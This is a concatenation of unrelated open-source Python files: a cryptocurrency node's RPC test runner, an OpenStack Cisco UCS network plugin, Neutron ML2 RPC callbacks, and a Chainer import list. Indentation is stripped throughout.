if ENABLE_ZMQ:
try:
import zmq
except ImportError as e:
print("ERROR: \"import zmq\" failed. Set ENABLE_ZMQ=0 or " \
"to run zmq tests, see dependency info in /qa/README.md.")
raise e
#Tests
testScripts = [
'bip68-112-113-p2p.py',
'wallet.py',
'listtransactions.py',
'receivedby.py',
'mempool_resurrect_test.py',
'txn_doublespend.py --mineblock',
'txn_clone.py',
'getchaintips.py',
'rawtransactions.py',
'rest.py',
'mempool_spendcoinbase.py',
'mempool_reorg.py',
'mempool_limit.py',
'httpbasics.py',
'multi_rpc.py',
'zapwallettxes.py',
'proxy_test.py',
'merkle_blocks.py',
'fundrawtransaction.py',
'signrawtransactions.py',
'walletbackup.py',
'nodehandling.py',
'reindex.py',
'addressindex.py',
'timestampindex.py',
'spentindex.py',
'decodescript.py',
'p2p-fullblocktest.py', # NOTE: needs innova_hash to pass
'blockchain.py',
'disablewallet.py',
'sendheaders.py', # NOTE: needs innova_hash to pass
'keypool.py',
'prioritise_transaction.py',
'invalidblockrequest.py', # NOTE: needs innova_hash to pass
'invalidtxrequest.py', # NOTE: needs innova_hash to pass
'abandonconflict.py',
'p2p-versionbits-warning.py',
]
if ENABLE_ZMQ:
testScripts.append('zmq_test.py')
testScriptsExt = [
'bip9-softforks.py',
'bip65-cltv.py',
'bip65-cltv-p2p.py', # NOTE: needs innova_hash to pass
'bip68-sequence.py',
'bipdersig-p2p.py', # NOTE: needs innova_hash to pass
'bipdersig.py',
'getblocktemplate_longpoll.py', # FIXME: "socket.error: [Errno 54] Connection reset by peer" on my Mac, same as https://github.com/bitcoin/bitcoin/issues/6651
'getblocktemplate_proposals.py',
'txn_doublespend.py',
'txn_clone.py --mineblock',
# 'pruning.py', # Prune mode is incompatible with -txindex.
'forknotify.py',
'invalidateblock.py',
# 'rpcbind_test.py', #temporary, bug in libevent, see #6655
'smartfees.py',
'maxblocksinflight.py',
'p2p-acceptblock.py', # NOTE: needs innova_hash to pass
'mempool_packages.py',
'maxuploadtarget.py',
# 'replace-by-fee.py', # RBF is disabled in Innova Core
]
def runtests():
coverage = None
if ENABLE_COVERAGE:
coverage = RPCCoverage()
print("Initializing coverage directory at %s\n" % coverage.dir)
rpcTestDir = buildDir + '/qa/rpc-tests/'
run_extended = '-extended' in opts
cov_flag = coverage.flag if coverage else ''
flags = " --srcdir %s/src %s %s" % (buildDir, cov_flag, passOn)
#Run Tests
for i in range(len(testScripts)):
if (len(opts) == 0
or (len(opts) == 1 and "-win" in opts )
or run_extended
or testScripts[i] in opts
or re.sub(".py$", "", testScripts[i]) in opts ):
print("Running testscript %s%s%s ..." % (bold[1], testScripts[i], bold[0]))
time0 = time.time()
subprocess.check_call(
rpcTestDir + testScripts[i] + flags, shell=True)
print("Duration: %s s\n" % (int(time.time() - time0)))
# exit if help is called so we print just one set of
# instructions
p = re.compile(" -h| --help")
if p.match(passOn):
sys.exit(0)
# Run Extended Tests
for i in range(len(testScriptsExt)):
if (run_extended or testScriptsExt[i] in opts
or re.sub(".py$", "", testScriptsExt[i]) in opts):
print(
"Running 2nd level testscript "
+ "%s%s%s ..." % (bold[1], testScriptsExt[i], bold[0]))
time0 = time.time()
subprocess.check_call(
rpcTestDir + testScriptsExt[i] + flags, shell=True)
print("Duration: %s s\n" % (int(time.time() - time0)))
if coverage:
coverage.report_rpc_coverage()
print("Cleaning up coverage data")
coverage.cleanup()
class RPCCoverage(object):
"""
Coverage reporting utilities for pull-tester.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: qa/rpc-tests/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir %s' % self.dir
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - %s\n" % i) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `qa/rpc-tests/test-framework/coverage.py`
REFERENCE_FILENAME = 'rpc_interface.txt'
COVERAGE_FILE_PREFIX = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, REFERENCE_FILENAME)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r') as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(COVERAGE_FILE_PREFIX):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r') as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
if __name__ == '__main__':
runtests()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sumit Naiksatam, Cisco Systems, Inc.
#
import logging
from quantum.db import api as db
from quantum.openstack.common import importutils
from quantum.plugins.cisco.common import cisco_constants as const
from quantum.plugins.cisco.common import cisco_credentials_v2 as cred
from quantum.plugins.cisco.common import cisco_exceptions as cexc
from quantum.plugins.cisco.common import cisco_utils as cutil
from quantum.plugins.cisco.db import network_db_v2 as cdb
from quantum.plugins.cisco.db import ucs_db_v2 as udb
from quantum.plugins.cisco.l2device_plugin_base import L2DevicePluginBase
from quantum.plugins.cisco.ucs import cisco_ucs_configuration as conf
LOG = logging.getLogger(__name__)
class UCSVICPlugin(L2DevicePluginBase):
"""UCS Device Plugin"""
def __init__(self):
self._driver = importutils.import_object(conf.UCSM_DRIVER)
LOG.debug("Loaded driver %s\n" % conf.UCSM_DRIVER)
# TODO (Sumit) Make the counter per UCSM
self._port_profile_counter = 0
def get_all_networks(self, tenant_id, **kwargs):
"""
Returns a dictionary containing all
<network_uuid, network_name> for
the specified tenant.
"""
LOG.debug("UCSVICPlugin:get_all_networks() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
networks_list = db.network_list(tenant_id)
new_networks_list = []
for network in networks_list:
new_network_dict = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
[])
new_networks_list.append(new_network_dict)
return new_networks_list
def create_network(self, tenant_id, net_name, net_id, vlan_name, vlan_id,
**kwargs):
"""
Creates a new Virtual Network, and assigns it
a symbolic name.
"""
LOG.debug("UCSVICPlugin:create_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
self._driver.create_vlan(vlan_name, str(vlan_id), self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
ports_on_net = []
new_network_dict = cutil.make_net_dict(net_id,
net_name,
ports_on_net)
return new_network_dict
def delete_network(self, tenant_id, net_id, **kwargs):
"""
Deletes the network with the specified network identifier
belonging to the specified tenant.
"""
LOG.debug("UCSVICPlugin:delete_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
vlan_binding = cdb.get_vlan_binding(net_id)
vlan_name = vlan_binding[const.VLANNAME]
self._driver.delete_vlan(vlan_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
#Rohit:passing empty network name, might not need fixing
net_dict = cutil.make_net_dict(net_id,
"",
[])
return net_dict
def get_network_details(self, tenant_id, net_id, **kwargs):
"""
Deletes the Virtual Network belonging to a the
spec
"""
LOG.debug("UCSVICPlugin:get_network_details() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
ports_list = network[const.NETWORKPORTS]
ports_on_net = []
for port in ports_list:
new_port = cutil.make_port_dict(port[const.UUID],
port[const.PORTSTATE],
port[const.NETWORKID],
port[const.INTERFACEID])
ports_on_net.append(new_port)
new_network = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
ports_on_net)
return new_network
def update_network(self, tenant_id, net_id, **kwargs):
"""
Updates the symbolic name belonging to a particular
Virtual Network.
"""
LOG.debug("UCSVICPlugin:update_network() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
net_dict = cutil.make_net_dict(network[const.UUID],
network[const.NETWORKNAME],
[])
return net_dict
def get_all_ports(self, tenant_id, net_id, **kwargs):
"""
Retrieves all port identifiers belonging to the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:get_all_ports() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
network = db.network_get(net_id)
ports_list = network[const.NETWORKPORTS]
ports_on_net = []
for port in ports_list:
port_binding = udb.get_portbinding(port[const.UUID])
ports_on_net.append(port_binding)
return ports_on_net
def create_port(self, tenant_id, net_id, port_state, port_id, **kwargs):
"""
Creates a port on the specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:create_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
qos = None
ucs_inventory = kwargs[const.UCS_INVENTORY]
least_rsvd_blade_dict = kwargs[const.LEAST_RSVD_BLADE_DICT]
chassis_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_CHASSIS]
blade_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_ID]
blade_data_dict = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_DATA]
new_port_profile = self._create_port_profile(tenant_id, net_id,
port_id,
conf.DEFAULT_VLAN_NAME,
conf.DEFAULT_VLAN_ID)
profile_name = new_port_profile[const.PROFILE_NAME]
rsvd_nic_dict = ucs_inventory.reserve_blade_interface(
self._ucsm_ip, chassis_id,
blade_id, blade_data_dict,
tenant_id, port_id,
profile_name)
port_binding = udb.update_portbinding(port_id,
portprofile_name=profile_name,
vlan_name=conf.DEFAULT_VLAN_NAME,
vlan_id=conf.DEFAULT_VLAN_ID,
qos=qos)
return port_binding
def delete_port(self, tenant_id, net_id, port_id, **kwargs):
"""
Deletes a port on a specified Virtual Network,
if the port contains a remote interface attachment,
the remote interface should first be un-plugged and
then the port can be deleted.
"""
LOG.debug("UCSVICPlugin:delete_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
ucs_inventory = kwargs[const.UCS_INVENTORY]
chassis_id = kwargs[const.CHASSIS_ID]
blade_id = kwargs[const.BLADE_ID]
interface_dn = kwargs[const.BLADE_INTF_DN]
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
self._delete_port_profile(port_id, profile_name)
ucs_inventory.unreserve_blade_interface(self._ucsm_ip, chassis_id,
blade_id, interface_dn)
return udb.remove_portbinding(port_id)
def update_port(self, tenant_id, net_id, port_id, **kwargs):
"""
Updates the state of a port on the specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:update_port() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
pass
def get_port_details(self, tenant_id, net_id, port_id, **kwargs):
"""
This method allows the user to retrieve a remote interface
that is attached to this particular port.
"""
LOG.debug("UCSVICPlugin:get_port_details() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
return port_binding
def plug_interface(self, tenant_id, net_id, port_id, remote_interface_id,
**kwargs):
"""
Attaches a remote interface to the specified port on the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:plug_interface() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
old_vlan_name = port_binding[const.VLANNAME]
new_vlan_name = self._get_vlan_name_for_network(tenant_id, net_id)
new_vlan_id = self._get_vlan_id_for_network(tenant_id, net_id)
self._driver.change_vlan_in_profile(profile_name, old_vlan_name,
new_vlan_name, self._ucsm_ip,
self._ucsm_username,
self._ucsm_password)
return udb.update_portbinding(port_id, vlan_name=new_vlan_name,
vlan_id=new_vlan_id)
def unplug_interface(self, tenant_id, net_id, port_id, **kwargs):
"""
Detaches a remote interface from the specified port on the
specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:unplug_interface() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
port_binding = udb.get_portbinding(port_id)
profile_name = port_binding[const.PORTPROFILENAME]
old_vlan_name = port_binding[const.VLANNAME]
new_vlan_name = conf.DEFAULT_VLAN_NAME
self._driver.change_vlan_in_profile(profile_name, old_vlan_name,
new_vlan_name, self._ucsm_ip,
self._ucsm_username,
self._ucsm_password)
return udb.update_portbinding(port_id, vlan_name=new_vlan_name,
vlan_id=conf.DEFAULT_VLAN_ID)
def create_multiport(self, tenant_id, net_id_list, ports_num,
port_id_list, **kwargs):
"""
Creates a port on the specified Virtual Network.
"""
LOG.debug("UCSVICPlugin:create_multiport() called\n")
self._set_ucsm(kwargs[const.DEVICE_IP])
qos = None
ucs_inventory = kwargs[const.UCS_INVENTORY]
least_rsvd_blade_dict = kwargs[const.LEAST_RSVD_BLADE_DICT]
chassis_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_CHASSIS]
blade_id = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_ID]
blade_data_dict = least_rsvd_blade_dict[const.LEAST_RSVD_BLADE_DATA]
port_binding_list = []
for port_id, net_id in zip(port_id_list, net_id_list):
new_port_profile = self._create_port_profile(
tenant_id, net_id, port_id,
conf.DEFAULT_VLAN_NAME,
conf.DEFAULT_VLAN_ID)
profile_name = new_port_profile[const.PROFILE_NAME]
rsvd_nic_dict = ucs_inventory.reserve_blade_interface(
self._ucsm_ip, chassis_id,
blade_id, blade_data_dict,
tenant_id, port_id,
profile_name)
port_binding = udb.update_portbinding(
port_id,
portprofile_name=profile_name,
vlan_name=conf.DEFAULT_VLAN_NAME,
vlan_id=conf.DEFAULT_VLAN_ID,
qos=qos)
port_binding_list.append(port_binding)
return port_binding_list
def detach_port(self, tenant_id, instance_id, instance_desc, **kwargs):
"""
Remove the association of the VIF with the dynamic vnic
"""
LOG.debug("detach_port() called\n")
port_id = kwargs[const.PORTID]
kwargs.pop(const.PORTID)
return self.unplug_interface(tenant_id, None, port_id, **kwargs)
def _get_profile_name(self, port_id):
"""Returns the port profile name based on the port UUID"""
profile_name = conf.PROFILE_NAME_PREFIX + cutil.get16ByteUUID(port_id)
return profile_name
def _get_vlan_name_for_network(self, tenant_id, network_id):
"""Return the VLAN name as set by the L2 network plugin"""
vlan_binding = cdb.get_vlan_binding(network_id)
return vlan_binding[const.VLANNAME]
def _get_vlan_id_for_network(self, tenant_id, network_id):
"""Return the VLAN id as set by the L2 network plugin"""
vlan_binding = cdb.get_vlan_binding(network_id)
return vlan_binding[const.VLANID]
def _create_port_profile(self, tenant_id, net_id, port_id, vlan_name,
vlan_id):
"""Create port profile in UCSM"""
if self._port_profile_counter >= int(conf.MAX_UCSM_PORT_PROFILES):
raise cexc.UCSMPortProfileLimit(net_id=net_id, port_id=port_id)
profile_name = self._get_profile_name(port_id)
self._driver.create_profile(profile_name, vlan_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
self._port_profile_counter += 1
new_port_profile = {const.PROFILE_NAME: profile_name,
const.PROFILE_VLAN_NAME: vlan_name,
const.PROFILE_VLAN_ID: vlan_id}
return new_port_profile
def _delete_port_profile(self, port_id, profile_name):
"""Delete port profile in UCSM"""
self._driver.delete_profile(profile_name, self._ucsm_ip,
self._ucsm_username, self._ucsm_password)
self._port_profile_counter -= 1
def _set_ucsm(self, ucsm_ip):
"""Set the UCSM IP, username, and password"""
self._ucsm_ip = ucsm_ip
self._ucsm_username = cred.Store.get_username(conf.UCSM_IP_ADDRESS)
self._ucsm_password = cred.Store.get_password(conf.UCSM_IP_ADDRESS)
|
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import port_security as psec
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib import constants as n_const
from neutron_lib.plugins import directory
from neutron_lib.plugins.ml2 import api
from neutron_lib.services.qos import constants as qos_consts
from oslo_log import log
import oslo_messaging
from sqlalchemy.orm import exc
from neutron.api.rpc.handlers import dvr_rpc
from neutron.api.rpc.handlers import securitygroups_rpc as sg_rpc
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron.db import l3_hamode_db
from neutron.db import provisioning_blocks
from neutron.plugins.ml2 import db as ml2_db
from neutron.plugins.ml2.drivers import type_tunnel
# REVISIT(kmestery): Allow the type and mechanism drivers to supply the
# mixins and eventually remove the direct dependencies on type_tunnel.
LOG = log.getLogger(__name__)
class RpcCallbacks(type_tunnel.TunnelRpcCallbackMixin):
# history
# 1.0 Initial version (from openvswitch/linuxbridge)
# 1.1 Support Security Group RPC
# 1.2 Support get_devices_details_list
# 1.3 get_device_details rpc signature upgrade to obtain 'host' and
# return value to include fixed_ips and device_owner for
# the device port
# 1.4 tunnel_sync rpc signature upgrade to obtain 'host'
# 1.5 Support update_device_list and
# get_devices_details_list_and_failed_devices
target = oslo_messaging.Target(version='1.5')
def __init__(self, notifier, type_manager):
self.setup_tunnel_callback_mixin(notifier, type_manager)
super(RpcCallbacks, self).__init__()
def _get_new_status(self, host, port_context):
port = port_context.current
if not host or host == port_context.host:
new_status = (n_const.PORT_STATUS_BUILD if port['admin_state_up']
else n_const.PORT_STATUS_DOWN)
if port['status'] != new_status:
return new_status
def get_device_details(self, rpc_context, **kwargs):
"""Agent requests device details."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
# cached networks used for reducing number of network db calls
# for server internal usage only
cached_networks = kwargs.get('cached_networks')
LOG.debug("Device %(device)s details requested by agent "
"%(agent_id)s with host %(host)s",
{'device': device, 'agent_id': agent_id, 'host': host})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port_context = plugin.get_bound_port_context(rpc_context,
port_id,
host,
cached_networks)
if not port_context:
LOG.debug("Device %(device)s requested by agent "
"%(agent_id)s not found in database",
{'device': device, 'agent_id': agent_id})
return {'device': device}
port = port_context.current
# caching information about networks for future use
if cached_networks is not None:
if port['network_id'] not in cached_networks:
cached_networks[port['network_id']] = (
port_context.network.current)
result = self._get_device_details(rpc_context, agent_id=agent_id,
host=host, device=device,
port_context=port_context)
if 'network_id' in result:
# success so we update status
new_status = self._get_new_status(host, port_context)
if new_status:
plugin.update_port_status(rpc_context,
port_id,
new_status,
host,
port_context.network.current)
return result
def _get_device_details(self, rpc_context, agent_id, host, device,
port_context):
segment = port_context.bottom_bound_segment
port = port_context.current
if not segment:
LOG.warning("Device %(device)s requested by agent "
"%(agent_id)s on network %(network_id)s not "
"bound, vif_type: %(vif_type)s",
{'device': device,
'agent_id': agent_id,
'network_id': port['network_id'],
'vif_type': port_context.vif_type})
return {'device': device}
network_qos_policy_id = port_context.network._network.get(
qos_consts.QOS_POLICY_ID)
entry = {'device': device,
'network_id': port['network_id'],
'port_id': port['id'],
'mac_address': port['mac_address'],
'admin_state_up': port['admin_state_up'],
'network_type': segment[api.NETWORK_TYPE],
'segmentation_id': segment[api.SEGMENTATION_ID],
'physical_network': segment[api.PHYSICAL_NETWORK],
'mtu': port_context.network._network.get('mtu'),
'fixed_ips': port['fixed_ips'],
'device_owner': port['device_owner'],
'allowed_address_pairs': port['allowed_address_pairs'],
'port_security_enabled': port.get(psec.PORTSECURITY, True),
'qos_policy_id': port.get(qos_consts.QOS_POLICY_ID),
'network_qos_policy_id': network_qos_policy_id,
'profile': port[portbindings.PROFILE]}
LOG.debug("Returning: %s", entry)
return entry
def get_devices_details_list(self, rpc_context, **kwargs):
# cached networks used for reducing number of network db calls
cached_networks = {}
return [
self.get_device_details(
rpc_context,
device=device,
cached_networks=cached_networks,
**kwargs
)
for device in kwargs.pop('devices', [])
]
def get_devices_details_list_and_failed_devices(self,
rpc_context,
**kwargs):
devices = []
failed_devices = []
devices_to_fetch = kwargs.pop('devices', [])
plugin = directory.get_plugin()
host = kwargs.get('host')
bound_contexts = plugin.get_bound_ports_contexts(rpc_context,
devices_to_fetch,
host)
for device in devices_to_fetch:
if not bound_contexts.get(device):
# unbound bound
LOG.debug("Device %(device)s requested by agent "
"%(agent_id)s not found in database",
{'device': device,
'agent_id': kwargs.get('agent_id')})
devices.append({'device': device})
continue
try:
devices.append(self._get_device_details(
rpc_context,
agent_id=kwargs.get('agent_id'),
host=host,
device=device,
port_context=bound_contexts[device]))
except Exception:
LOG.exception("Failed to get details for device %s",
device)
failed_devices.append(device)
new_status_map = {ctxt.current['id']: self._get_new_status(host, ctxt)
for ctxt in bound_contexts.values() if ctxt}
# filter out any without status changes
new_status_map = {p: s for p, s in new_status_map.items() if s}
try:
plugin.update_port_statuses(rpc_context, new_status_map, host)
except Exception:
LOG.exception("Failure updating statuses, retrying all")
failed_devices = devices_to_fetch
devices = []
return {'devices': devices,
'failed_devices': failed_devices}
def update_device_down(self, rpc_context, **kwargs):
"""Device no longer exists on agent."""
# TODO(garyk) - live migration and port status
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
LOG.debug("Device %(device)s no longer exists at agent "
"%(agent_id)s",
{'device': device, 'agent_id': agent_id})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port_exists = True
if (host and not plugin.port_bound_to_host(rpc_context,
port_id, host)):
LOG.debug("Device %(device)s not bound to the"
" agent host %(host)s",
{'device': device, 'host': host})
else:
try:
port_exists = bool(plugin.update_port_status(
rpc_context, port_id, n_const.PORT_STATUS_DOWN, host))
except exc.StaleDataError:
port_exists = False
LOG.debug("delete_port and update_device_down are being "
"executed concurrently. Ignoring StaleDataError.")
return {'device': device,
'exists': port_exists}
self.notify_l2pop_port_wiring(port_id, rpc_context,
n_const.PORT_STATUS_DOWN, host)
return {'device': device,
'exists': port_exists}
def update_device_up(self, rpc_context, **kwargs):
"""Device is up on agent."""
agent_id = kwargs.get('agent_id')
device = kwargs.get('device')
host = kwargs.get('host')
LOG.debug("Device %(device)s up at agent %(agent_id)s",
{'device': device, 'agent_id': agent_id})
plugin = directory.get_plugin()
port_id = plugin._device_to_port_id(rpc_context, device)
port = plugin.port_bound_to_host(rpc_context, port_id, host)
if host and not port:
LOG.debug("Device %(device)s not bound to the"
" agent host %(host)s",
{'device': device, 'host': host})
# this might mean that a VM is in the process of live migration
# and vif was plugged on the destination compute node;
# need to notify nova explicitly
port = ml2_db.get_port(rpc_context, port_id)
# _device_to_port_id may have returned a truncated UUID if the
# agent did not provide a full one (e.g. Linux Bridge case).
if not port:
LOG.debug("Port %s not found, will not notify nova.", port_id)
return
else:
if port.device_owner.startswith(
n_const.DEVICE_OWNER_COMPUTE_PREFIX):
plugin.nova_notifier.notify_port_active_direct(port)
return
else:
self.update_port_status_to_active(port, rpc_context, port_id, host)
self.notify_l2pop_port_wiring(port_id, rpc_context,
n_const.PORT_STATUS_ACTIVE, host)
def update_port_status_to_active(self, port, rpc_context, port_id, host):
plugin = directory.get_plugin()
if port and port['device_owner'] == n_const.DEVICE_OWNER_DVR_INTERFACE:
# NOTE(kevinbenton): we have to special case DVR ports because of
# the special multi-binding status update logic they have that
# depends on the host
plugin.update_port_status(rpc_context, port_id,
n_const.PORT_STATUS_ACTIVE, host)
else:
# _device_to_port_id may have returned a truncated UUID if the
# agent did not provide a full one (e.g. Linux Bridge case). We
# need to look up the full one before calling provisioning_complete
if not port:
port = ml2_db.get_port(rpc_context, port_id)
if not port:
# port doesn't exist, no need to add a provisioning block
return
provisioning_blocks.provisioning_complete(
rpc_context, port['id'], resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
def notify_l2pop_port_wiring(self, port_id, rpc_context,
status, host):
"""Notify the L2pop driver that a port has been wired/unwired.
The L2pop driver uses this notification to broadcast forwarding
entries to other agents on the same network as the port for port_id.
"""
plugin = directory.get_plugin()
l2pop_driver = plugin.mechanism_manager.mech_drivers.get(
'l2population')
if not l2pop_driver:
return
port = ml2_db.get_port(rpc_context, port_id)
if not port:
return
# NOTE: DVR ports are already handled and updated through l2pop
# and so we don't need to update it again here
if port['device_owner'] == n_const.DEVICE_OWNER_DVR_INTERFACE:
return
port_context = plugin.get_bound_port_context(
rpc_context, port_id)
if not port_context:
# port deleted
return
port = port_context.current
if (status == n_const.PORT_STATUS_ACTIVE and
port[portbindings.HOST_ID] != host and
not l3_hamode_db.is_ha_router_port(rpc_context,
port['device_owner'],
port['device_id'])):
# don't setup ACTIVE forwarding entries unless bound to this
# host or if it's an HA port (which is special-cased in the
# mech driver)
return
port_context.current['status'] = status
port_context.current[portbindings.HOST_ID] = host
if status == n_const.PORT_STATUS_ACTIVE:
l2pop_driver.obj.update_port_up(port_context)
else:
l2pop_driver.obj.update_port_down(port_context)
def update_device_list(self, rpc_context, **kwargs):
devices_up = []
failed_devices_up = []
devices_down = []
failed_devices_down = []
devices = kwargs.get('devices_up')
if devices:
for device in devices:
try:
self.update_device_up(
rpc_context,
device=device,
**kwargs)
except Exception:
failed_devices_up.append(device)
LOG.error("Failed to update device %s up", device)
else:
devices_up.append(device)
devices = kwargs.get('devices_down')
if devices:
for device in devices:
try:
dev = self.update_device_down(
rpc_context,
device=device,
**kwargs)
except Exception:
failed_devices_down.append(device)
LOG.error("Failed to update device %s down", device)
else:
devices_down.append(dev)
return {'devices_up': devices_up,
'failed_devices_up': failed_devices_up,
'devices_down': devices_down,
'failed_devices_down': failed_devices_down}
class AgentNotifierApi(dvr_rpc.DVRAgentRpcApiMixin,
sg_rpc.SecurityGroupAgentRpcApiMixin,
type_tunnel.TunnelAgentRpcApiMixin):
"""Agent side of the openvswitch rpc API.
API version history:
1.0 - Initial version.
1.1 - Added get_active_networks_info, create_dhcp_port,
update_dhcp_port, and removed get_dhcp_port methods.
1.4 - Added network_update
"""
def __init__(self, topic):
self.topic = topic
self.topic_network_delete = topics.get_topic_name(topic,
topics.NETWORK,
topics.DELETE)
self.topic_port_update = topics.get_topic_name(topic,
topics.PORT,
topics.UPDATE)
self.topic_port_delete = topics.get_topic_name(topic,
topics.PORT,
topics.DELETE)
self.topic_network_update = topics.get_topic_name(topic,
topics.NETWORK,
topics.UPDATE)
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def network_delete(self, context, network_id):
cctxt = self.client.prepare(topic=self.topic_network_delete,
fanout=True)
cctxt.cast(context, 'network_delete', network_id=network_id)
def port_update(self, context, port, network_type, segmentation_id,
physical_network):
cctxt = self.client.prepare(topic=self.topic_port_update,
fanout=True)
cctxt.cast(context, 'port_update', port=port,
network_type=network_type, segmentation_id=segmentation_id,
physical_network=physical_network)
def port_delete(self, context, port_id):
cctxt = self.client.prepare(topic=self.topic_port_delete,
fanout=True)
cctxt.cast(context, 'port_delete', port_id=port_id)
def network_update(self, context, network):
cctxt = self.client.prepare(topic=self.topic_network_update,
fanout=True, version='1.4')
cctxt.cast(context, 'network_update', network=network)
|
|
"""Collection of function implementations.
Functions are either implemented as :class:`~chainer.Function`\\ s or
:class:`~chainer.FunctionNode`\\ s.
"""
from chainer.functions.activation.clipped_relu import clipped_relu # NOQA
from chainer.functions.activation.clipped_relu import ClippedReLU # NOQA
from chainer.functions.activation.crelu import crelu # NOQA
from chainer.functions.activation.crelu import CReLU # NOQA
from chainer.functions.activation.elu import elu # NOQA
from chainer.functions.activation.elu import ELU # NOQA
from chainer.functions.activation.hard_sigmoid import hard_sigmoid # NOQA
from chainer.functions.activation.hard_sigmoid import HardSigmoid # NOQA
from chainer.functions.activation.leaky_relu import leaky_relu # NOQA
from chainer.functions.activation.leaky_relu import LeakyReLU # NOQA
from chainer.functions.activation.log_softmax import log_softmax # NOQA
from chainer.functions.activation.log_softmax import LogSoftmax # NOQA
from chainer.functions.activation.lstm import lstm # NOQA
from chainer.functions.activation.lstm import LSTM # NOQA
from chainer.functions.activation.maxout import maxout # NOQA
from chainer.functions.activation.prelu import prelu # NOQA
from chainer.functions.activation.relu import relu # NOQA
from chainer.functions.activation.relu import ReLU # NOQA
from chainer.functions.activation.selu import selu # NOQA
from chainer.functions.activation.sigmoid import sigmoid # NOQA
from chainer.functions.activation.sigmoid import Sigmoid # NOQA
from chainer.functions.activation.slstm import slstm # NOQA
from chainer.functions.activation.slstm import SLSTM # NOQA
from chainer.functions.activation.softmax import softmax # NOQA
from chainer.functions.activation.softmax import Softmax # NOQA
from chainer.functions.activation.softplus import softplus # NOQA
from chainer.functions.activation.softplus import Softplus # NOQA
from chainer.functions.activation.swish import swish # NOQA
from chainer.functions.activation.tanh import tanh # NOQA
from chainer.functions.activation.tanh import Tanh # NOQA
from chainer.functions.activation.tree_lstm import tree_lstm # NOQA
from chainer.functions.array.broadcast import broadcast # NOQA
from chainer.functions.array.broadcast import Broadcast # NOQA
from chainer.functions.array.broadcast import broadcast_to # NOQA
from chainer.functions.array.broadcast import BroadcastTo # NOQA
from chainer.functions.array.cast import cast # NOQA
from chainer.functions.array.cast import Cast # NOQA
from chainer.functions.array.concat import concat # NOQA
